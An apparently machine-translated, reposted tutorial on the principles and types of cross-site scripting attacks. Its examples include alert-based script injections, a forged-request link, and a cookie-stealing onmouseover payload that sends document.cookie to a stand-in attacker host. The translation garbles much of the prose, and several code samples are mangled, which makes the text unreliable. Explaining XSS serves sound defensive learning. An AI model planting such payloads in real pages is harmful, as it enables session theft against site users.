The principle of XSS attack

Address reproduced in this article: http://www.2cto.com/Article/201209/156182.html

An XSS (Cross-site scripting) attack is an attacker who inserts malicious HTML tags or JavaScript code into a Web page, and when a user browses to the page or does something, the attacker takes advantage of the user's trust in the original site, Trick a user or browser into performing some unsafe action or submitting a user's private information to another website.
For example, the attacker put a seemingly secure link in the forum, cheat the user to click, steal the user's private information in the cookie, or the attacker in the forum to add a malicious form, when the user submits the form, but the message to the attacker's server, rather than the user originally thought of the trust site.
And so on, the only way to completely eliminate XSS attacks is to disable script,img and so on, obviously this is not reliable, users need rich content of the page, of course, we can use some methods to prevent XSS attacks, to minimize the harm caused by XSS.

The hazards of XSS attacks include

Stealing all kinds of user accounts, such as machine login account, user network Bank account, all kinds of administrator account
Control enterprise data, including the ability to read, tamper, add, and delete enterprise sensitive data
Theft of important business-value information
Illegal transfer
Force send e-mail
Website Hanging Horse
Control the victim's machine to launch attacks on other websites
Example:

1 <body background= "Javascript:alert (' xss–gotcha! ')" >2 <iframe src=javascript:alert (' xss–gotcha! ') ></iframe>3 > <body onload= "A ();" ><script>function A () {alert (' xss-gotcha! ');} </script>< "

XSS Attack classification
Classification Method One
XSS attacks fall into two categories: attacks from other sites to application sites, attacks from application sites to the same station or other sites
Attacks from other sites to application sites: hence the name, this attack is initiated externally from an email or other site. This kind of attack when the user clicks the link, downloads the picture or submits the form, has carried on the intention to the application website operation.
Usually a user is logged in to get a usable session,xss attacker can take advantage of this session, bypassing user authentication and doing some unsafe operations, as follows:

1 <a href = "http://  www.2cto.com/addComment.php?subject = i%20am%20owned" >check it out!< ;/a>

With this link, as soon as the user logs in, a subject is sent, even on other websites.
Because of this, a generic mailbox client does not automatically load pictures from untrusted sites (because a GET request can be sent to a third-party site through the SRC attribute of img), and the session's expiration time can be set to expire automatically.

Attacks from the application site to the same station or other sites: this attack, usually by commenting on the application site, or otherwise embedding the code, when the user loads the page or clicks on the link will produce some actions other than intended.
As follows:

1 <a href= "#" OnmouSEOver = "window.location = ' http://reallybadguys.net/collectcookie.php?" Cookie = + document Cookie.escape (); ">check it out!</a>

When the user slips through the link, the cookie information is sent to the attacker's server.

Classification Method II
Another way to classify XSS (a more personal sense) is to divide XSS attacks into three types,
Type A, a locally exploited vulnerability that exists in the client script itself on the page.

The attack process is as follows:

Alice sends Bob a malicious URL that constructs the Web.
Bob clicks and looks at the URL.
JavaScript in a malicious page opens a vulnerable HTML page and installs it on Bob's computer.
The vulnerable HTML page contains javascript that executes on the local domain of Bob's computer.
Alice's malicious script can execute commands on Bob's computer under the privileges that Bob holds.
Type B

Reflection vulnerability, which is similar to type A, unlike when Web clients provide data to users using server-side script generation pages, client code can be injected into dynamic pages if unauthenticated user data is included in the page without HTML entity encoding.

The principle of XSS attack